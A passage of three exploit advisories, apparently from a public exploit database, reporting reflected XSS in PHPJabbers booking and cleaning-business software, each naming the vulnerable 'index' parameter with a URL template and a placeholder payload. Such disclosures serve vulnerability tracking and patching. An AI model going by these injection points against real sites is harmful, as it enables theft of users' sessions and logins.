# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/cleaning-business-software/
# Version: 1.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4115

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /index.php

GET parameter 'index' is vulnerable to RXSS

https://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS]

[-] Done
-
PHPJabbers Night Club Booking 1.0 - Reflected XSS
# Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 21/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/night-club-booking-software/
# Version: 1.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4114

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /index.php

GET parameter 'index' is vulnerable to RXSS

https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
-
PHPJabbers Rental Property Booking 2.0 - Reflected XSS
# Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 22/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4117

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /index.php

GET parameter 'index' is vulnerable to RXSS

https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=

[-] Done